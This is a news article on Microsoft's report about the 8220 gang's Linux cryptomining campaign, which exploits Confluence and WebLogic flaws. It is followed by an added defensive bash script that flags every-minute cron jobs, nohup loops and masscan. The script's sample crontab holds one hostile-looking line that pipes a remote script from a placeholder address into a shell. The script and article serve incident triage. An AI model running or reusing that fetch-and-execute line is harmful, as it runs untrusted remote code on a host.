Microsoft says it has spotted “notable updates” to a malware campaign that targets Linux servers to install cryptomining malware.
Microsoft has called out recent work from the so-called “8220 gang” group, which has recently been spotted exploiting the critical bug affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134.
“The group has actively updated its techniques and payloads over the last year. The most recent campaign targets i686 and x86_64 Linux systems and uses RCE exploits for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) for initial access,” Microsoft’s Security Intelligence Centre notes.
“The updates include the deployment of new versions of a cryptominer and an IRC bot, as well as the use of an exploit for a recently disclosed vulnerability,” Microsoft warned.
Atlassian disclosed the bug on June 2, and within a week security firm Check Point found the 8220 gang using it to install malware on Linux systems. The group was also using the same flaw against Windows systems, where it loaded a PowerShell script directly into memory.
CISA had already told federal agencies to patch it by June 6 and, until then, to block all internet access to the product.
The 8220 gang has been active since 2017, according to Cisco’s Talos Intelligence group, which described it as a Chinese-speaking, Monero-mining threat actor whose C2 servers often communicate over port 8220, hence the name. At that time it was exploiting Apache Struts2 and Docker image vulnerabilities to compromise enterprise servers.
According to Microsoft, after the 8220 gang gains initial access via CVE-2022-26134, it downloads a loader that changes the system’s configuration to disable security services, downloads a cryptominer, establishes persistence on the compromised host, and then scans ports on the network to find other servers.
Microsoft advises admins to enable tamper protection in Defender for Endpoint, because the loader clears log files and disables cloud-monitoring and security tools.
The loader downloads the pwnRig cryptominer (v1.41.9) and an IRC bot that takes commands from a C2 server. It persists either by creating a cron job, which survives a reboot, or by running a script every 60 seconds as a nohup (“no hangup”) process so that it outlives the attacker’s session.
“The loader uses the IP port scanner tool “masscan” to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool “spirit” to propagate. It also scans the local disk for SSH keys to move laterally by connecting to known hosts,” Microsoft explains.
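The persistence and spread behaviour described above (an every-minute cron job, a nohup’d loop, and masscan used to find SSH targets) is exactly what a responder would hunt for on a suspect Linux host. The script below is an added triage example written for this page; it is not Microsoft’s, Check Point’s or the 8220 gang’s code. It flags cron entries scheduled every minute and processes that look like nohup or sleep-60 loops, and in live mode also checks whether masscan is on the PATH. The SAMPLE_* inputs are constructed for the demonstration; the paths and the TEST-NET address 203.0.113.10 in them are placeholders, not real indicators from the campaign.

```shell
#!/usr/bin/env bash
# Added triage helper for the persistence and spread behaviour described in
# the article. Illustrative code written for this page, not Microsoft's or the
# attackers' tooling. SAMPLE_* inputs are constructed; the paths and the
# TEST-NET address 203.0.113.10 inside them are placeholders, not indicators.

# Constructed crontab: one benign daily job and one every-minute job that pulls
# a remote script into a shell, the cadence the loader is reported to use.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
* * * * * curl -fsSL http://203.0.113.10/x.sh | sh'

# Constructed `ps -eo pid,ppid,cmd` output with one nohup / sleep-60 loop.
SAMPLE_PS='  PID  PPID CMD
    1     0 /sbin/init
  812     1 /usr/sbin/cron -f
 2311     1 /bin/sh -c while true; do nohup /tmp/.x/update.sh; sleep 60; done
 2315  2311 sleep 60'

# Print crontab lines scheduled to run every minute ("* * * * *").
# Comment lines, blank lines and VAR=value lines are skipped (fewer than 6 fields).
flag_every_minute_cron() {
  printf '%s\n' "$1" | awk '
    /^[[:space:]]*#/ || NF < 6 { next }
    $1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*" { print }'
}

# Print process lines that look like a nohup-launched job or a 60-second sleep loop.
flag_nohup_loops() {
  printf '%s\n' "$1" | grep -E 'nohup|while .*sleep 60' || true
}

# Count lines in a string, treating the empty string as 0 rather than 1.
count_lines() {
  if [ -z "$1" ]; then echo 0; else printf '%s\n' "$1" | wc -l | tr -d ' '; fi
}

# Live triage: the same checks against the running host, plus a look for the
# scanner binary named in Microsoft's description. Run as root to see every
# user's crontab.
run_live_triage() {
  local crons
  crons=$( { crontab -l 2>/dev/null; cat /etc/crontab /etc/cron.d/* 2>/dev/null; } )
  echo "== every-minute cron entries =="
  flag_every_minute_cron "$crons"
  echo "== nohup / sleep-60 loops =="
  flag_nohup_loops "$(ps -eo pid,ppid,cmd 2>/dev/null)"
  echo "== masscan on PATH =="
  command -v masscan || echo "not found"
}

# Default: demonstrate on the constructed samples. LIVE=1 inspects the host.
if [ "${LIVE:-0}" = "1" ]; then
  run_live_triage
else
  echo "== every-minute cron entries (sample) =="
  flag_every_minute_cron "$SAMPLE_CRONTAB"
  echo "== nohup / sleep-60 loops (sample) =="
  flag_nohup_loops "$SAMPLE_PS"
fi
```

Run it as-is to see the checks fire on the constructed samples, or with `LIVE=1` to run them against the current host. Hits on either check are leads, not verdicts: plenty of legitimate monitoring agents run every minute, so pair the output with the log-clearing and disabled-security-tool symptoms Microsoft describes before drawing conclusions.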